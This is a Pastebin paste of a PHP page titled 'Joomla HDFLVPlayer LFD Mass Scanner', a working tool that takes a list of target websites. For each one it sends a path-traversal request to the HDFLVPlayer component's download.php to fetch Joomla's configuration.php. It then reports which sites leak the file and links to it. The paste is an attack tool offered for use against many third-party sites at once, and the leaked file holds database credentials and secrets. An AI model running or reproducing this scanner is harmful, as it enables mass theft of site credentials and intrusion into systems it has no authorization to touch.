Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- Coded By Synchronizer
- Facebook : http://facebook.com/annam.go.id
- i'm not hacker :)
- i just muslim people , yang kadang kadang coli sambil salto :)
- -->
- <html>
- <title>Joomla HDFLVPlayer LFD Mass Scanner</title>
- <style>
- body {
- background:#3E3939;
- color:lime;
- }
- a {
- text-decoration:none;
- }
- .keydown {
- background:black;
- color:lime;
- width:300px;
- height:30px;
- border:1px solid lime;
- }
- .syn { background:#CEC018;border: 1px solid green;color: black;width:500px;}
- td {
- text-align:center;
- padding:1px;
- background:whitesmoke;
- color: black;
- }
- </style>
- <center><h1>Joomla HDFLVPlayer LFD Mass Scanner</h1>
- <h4>coded by <a href="http://fb.com/annam.go.id"><font color=white>synchronizer</font></a></h4>
- <form method="post" action="" enctype="multipart/form-data">
- <textarea placeholder="your target without http:// => www.target.com" style="padding: 5px; resize: none; width: 500px; height: 200px; border: solid 2px #006400;" name="sites"></textarea><br>
- <br><input type="submit" class="keydown" name="scan" value="START CHECKING !" style="margin: 5px auto;">
- </form>
- <?php
- if(isset($_POST['sites'])) {
- $databro = $_POST['sites'];
- if(empty($databro)) {
- echo 'WEBSITE LIST NOT FOUND, TEXT AREA CAN`T EMPTY<br><br><font color=yellow size=4>SCAN CANCELED !</font>';
- }else {
- echo'<hr color=silver width=500px><br><table class="syn">
- <tr>
- <th>NO</th>
- <th>WEBSITE</th>
- <th>VULN</th>
- <th>LINK</th>
- </tr>
- ';
- $no=1;
- $site = explode("\r\n", $_POST['sites']);
- $dana = str_replace('http://','',$site);
- $wkwkwk = str_replace('https://','',$dana);
- $totalsite = count($site);
- foreach($wkwkwk as $sites) {
- $path = "http://$sites/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php";
- $gett=@file_get_contents($path);
- if(preg_match('/class JConfig {/',$gett)==1) {
- $status = "<font color=green>YES</font>";
- $link = "<a href='http://$sites/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php' target='_blank'>CLICK HERE</a>";}
- else{
- $status = "<font color=red>NO</font>";
- $link = "NOT AVAILABLE";
- }
- echo'
- <center><tr>
- <td>'.$no.'</td>
- <td>'.$sites.'</td>
- <td>'.$status.'</td>
- <td>'.$link.'</td>
- </tr></center>
- ';
- $no++;
- }
- echo'</table><br><Br>';
- echo 'TOTAL WEBSITE CHECKED : '.$totalsite;
- echo '</center>';
- }
- }
- ?>
Add Comment
Please, Sign In to add comment